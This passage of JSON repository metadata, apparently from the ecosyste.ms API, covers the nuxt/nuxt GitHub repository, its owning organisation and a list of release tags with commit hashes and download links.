vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-17T01:26:04.118Z","repository_id":37288797,"created_at":"2025-08-17T01:26:04.118Z","updated_at":"2025-08-17T01:26:04.118Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":29414277,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-02-13T06:24:03.484Z","status":"ssl_error","status_checked_at":"2026-02-13T06:23:12.830Z","response_time":78,"last_error":"SSL_connect returned=1 errno=0 peeraddr=140.82.121.5:443 state=error: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"nuxt","name":"Nuxt","uuid":"23360933","kind":"organization","description":"The Intuitive Vue Framework","email":null,"website":"https://nuxt.com","location":"Global","twitter":"nuxt_js","company":null,"icon_url":"https://avatars.githubusercontent.com/u/23360933?v=4","repositories_count":62,"last_synced_at":"2026-01-11T15:52:13.608Z","metadata":{"has_sponsors_listing":true},"html_url":"https://github.com/nuxt","funding_links":["https://github.com/sponsors/nuxt"],"total_stars":116453,"followers":4523,"following":0,"created_at":"2022-11-02T16:30:40.909Z","updated_at":"2026-01-11T15:52:13.608Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/nuxt","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/nuxt/repositories"},"tags":[{"name":"v3.21.0","sha":"dbb5e73ec8e99fe1b3c646c112884210c8714298","kind":"commit","published_at":"2026-01-22T23:01:07.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.21.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.21.0/manifests"},{"name":"v4.3.0","sha":"b5bd7d9195bbd1c9cb174d43f6da2912fbd40bd3","kind":"commit","published_at":"2026-01-22T22:59:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.3.0/manifests"},{"name":"v4.2.2","sha":"185ae0f6da6cac51c1dcc010b8ca1ae7d5fee518","kind":"commit","published_at":"2025-12-09T17:16:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.2.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.2.2/manifests"},{"name":"v3.20.2","sha":"06449a8a7696bb090b6174adabea1b5a40bc5333","kind":"commit","published_at":"2025-12-09T17:10:36.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.20.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.20.2/manifests"},{"name":"v4.2.1","sha":"67ec213b30b0b1cd937d90d72664d19b62e4f830","kind":"commit","published_at":"2025-11-06T23:49:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.2.1/manifests"},{"name":"v3.20.1","sha":"1d2ee45924109c5726562cd11aaabc7ef9b963f8","kind":"commit","published_at":"2025-11-06T23:49:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.20.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.20.1/manifests"},{"name":"v3.20.0","sha":"617b266c732267755a8771b967d693b32e74fca4","kind":"commit","published_at":"2025-10-28T10:58:17.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.20.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.20.0/manifests"},{"name":"v4.2.0","sha":"be83cda268dec7a6e8b6a00d2777bfffb6435a83","kind":"commit","published_at":"2025-10-25T05:54:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.2.0/manifests"},{"name":"v4.1.3","sha":"2311b272f5935b82766dd9365fb7d81f72310ec2","kind":"commit","published_at":"2025-10-06T15:52:03.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.1.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.1.3/manifests"},{"name":"v3.19.3","sha":"f8874385b630b713a8dc0b85a98b64b982dc89ef","kind":"commit","published_at":"2025-10-06T15:47:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.19.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.19.3/manifests"},{"name":"v4.1.2","sha":"412786a1d8283aaa2360a855d44ebd3ac21924f1","kind":"commit","published_at":"2025-09-12T21:44:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.1.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.1.2/manifests"},{"name":"v3.19.2","sha":"350813b5a0b5f1b7f12ff95185e0a5946b42d625","kind":"commit","published_at":"2025-09-12T21:40:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.19.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.19.2/manifests"},{"name":"v4.1.1","sha":"f09180c493abb21b76ca26365ec21a77232f5f8d","kind":"commit","published_at":"2025-09-05T22:25:08.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.1.1/manifests"},{"name":"v3.19.1","sha":"544a76ff39e3064b507ed62cd17b1b5dcded7c90","kind":"commit","published_at":"2025-09-05T22:17:36.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.19.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.19.1/manifests"},{"name":"v4.1.0","sha":"e12125a97f91a9c9b98191e4b89a2fcc95c318db","kind":"commit","published_at":"2025-09-02T22:12:55.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.1.0/manifests"},{"name":"v3.19.0","sha":"895650538445a18b588e09c74d9cb640693b63f6","kind":"commit","published_at":"2025-09-02T22:12:36.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.19.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.19.0/manifests"},{"name":"v4.0.3","sha":"c09da8cfa0684bf70a3d657add7feb88ffd7807d","kind":"commit","published_at":"2025-08-05T08:26:51.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.0.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.3/manifests"},{"name":"v3.18.1","sha":"dfac5a97d2ec084e194c04f643221118fec9e4c6","kind":"commit","published_at":"2025-08-05T08:26:39.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.18.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.18.1/manifests"},{"name":"v4.0.2","sha":"5d3ef933c3ab2ee9aa3141b3fea7b1549ade7b3a","kind":"commit","published_at":"2025-07-28T23:50:25.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.0.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.2/manifests"},{"name":"v3.18.0","sha":"8d9ebfb2a10596211996778fb14b35a20024c319","kind":"commit","published_at":"2025-07-28T23:48:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.18.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.18.0/manifests"},{"name":"v4.0.1","sha":"3cfdac3c204c9d64240719f64935484b2b3318f2","kind":"commit","published_at":"2025-07-21T08:55:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.0.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.1/manifests"},{"name":"v4.0.0","sha":"8aacdde48e8388c8bb11b9a5c2f59935341bfcfd","kind":"commit","published_at":"2025-07-15T22:15:25.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.0.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0/manifests"},{"name":"v3.17.7","sha":"b56bc134455391f3ea43d29140162f0b04b615b0","kind":"commit","published_at":"2025-07-13T19:25:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.17.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.17.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.17.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.7/manifests"},{"name":"v4.0.0-rc.0","sha":"0344123b3c2c46c6f591c42696eef8ffc6504947","kind":"commit","published_at":"2025-07-07T22:42:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.0.0-rc.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.0.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.0.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0-rc.0/manifests"},{"name":"v3.17.6","sha":"9867529347c072efb8da5806f6a973cd853d72e1","kind":"commit","published_at":"2025-07-01T16:46:37.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.17.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.17.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.17.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.6/manifests"},{"name":"v4.0.0-alpha.4","sha":"14dd686b8b47beecf024318ae304919cd81ab4ad","kind":"commit","published_at":"2025-06-27T13:36:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.0.0-alpha.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.0.0-alpha.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0-alpha.4/manifests"},{"name":"v4.0.0-alpha.3","sha":"8b9e1a1ef774dab5a36a94268439079de1a887de","kind":"commit","published_at":"2025-06-26T16:17:25.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.0.0-alpha.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.0.0-alpha.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0-alpha.3/manifests"},{"name":"v4.0.0-alpha.2","sha":"4b56bb92b9242df959f091e1d2be72cd492f30ca","kind":"commit","published_at":"2025-06-12T09:16:55.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.0.0-alpha.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.0.0-alpha.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.0.0-alpha.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0-alpha.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0-alpha.2/manifests"},{"name":"v3.17.5","sha":"0fa7ff9908c8a573c1efedf216cdf5ec901820af","kind":"commit","published_at":"2025-06-03T21:38:14.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.17.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.17.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.17.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.5/manifests"},{"name":"v4.0.0-alpha.1","sha":"e379ac3e8dd3b37ca26a01d0dc0ffcbc46ece1aa","kind":"commit","published_at":"2025-06-02T19:45:37.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.0.0-alpha.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.0.0-alpha.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.0.0-alpha.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0-alpha.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0-alpha.1/manifests"},{"name":"v3.17.4","sha":"f7437ce28f83723492a1e540a9b43c56c469234a","kind":"commit","published_at":"2025-05-20T19:57:32.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.17.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.17.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.17.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.4/manifests"},{"name":"v3.17.3","sha":"c6dad342e6718377136c675c64d6e20c420dea81","kind":"commit","published_at":"2025-05-12T13:58:40.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.17.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.3/manifests"},{"name":"v3.17.2","sha":"346bb2bfe3324b353ec65d4b2f09b46e0a7c5c71","kind":"commit","published_at":"2025-05-05T08:54:20.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.17.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.2/manifests"},{"name":"v3.17.1","sha":"de02d2312d79f0bae4eb382a565253b7ddc98f86","kind":"commit","published_at":"2025-04-29T00:20:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.17.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.1/manifests"},{"name":"v3.17.0","sha":"fa4618c801a3549b56477b8e880f085f527baf84","kind":"commit","published_at":"2025-04-27T22:38:43.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.17.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.0/manifests"},{"name":"v3.16.2","sha":"be46b279d12b2ebca676a9db05244ae64c980f78","kind":"commit","published_at":"2025-04-01T10:36:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.16.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.16.2/manifests"},{"name":"v3.16.1","sha":"cd38de24c14e586b61f742e902ad1e3c2ebd2d31","kind":"commit","published_at":"2025-03-19T16:49:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.16.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.16.1/manifests"},{"name":"v3.16.0","sha":"7a37a982535f6da0cef16c4d7d3a81df42429ec1","kind":"commit","published_at":"2025-03-07T14:21:17.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.16.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.16.0/manifests"},{"name":"v3.15.4","sha":"244da170dd61e9aa790d5e9fdf988aa0a128d55a","kind":"commit","published_at":"2025-01-29T08:03:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.15.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.15.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.15.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.15.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.15.4/manifests"},{"name":"v3.15.3","sha":"048f974eba45e4909dcf53e8ce692fae3c5db37f","kind":"commit","published_at":"2025-01-24T23:38:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.15.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.15.3/manifests"},{"name":"v3.15.2","sha":"87a0ee59aec69c24a83993dcd329ecc9d25c3df3","kind":"commit","published_at":"2025-01-15T15:16:32.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.15.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.15.2/manifests"},{"name":"v3.15.1","sha":"fdf6e879ea00c9e313458e32dc911ca846a525d4","kind":"commit","published_at":"2025-01-05T12:04:54.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.15.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.15.1/manifests"},{"name":"v3.15.0","sha":"1acc9a0a3adabf250b979e58ed634874a9d90ddd","kind":"commit","published_at":"2024-12-24T23:47:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.15.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/reposito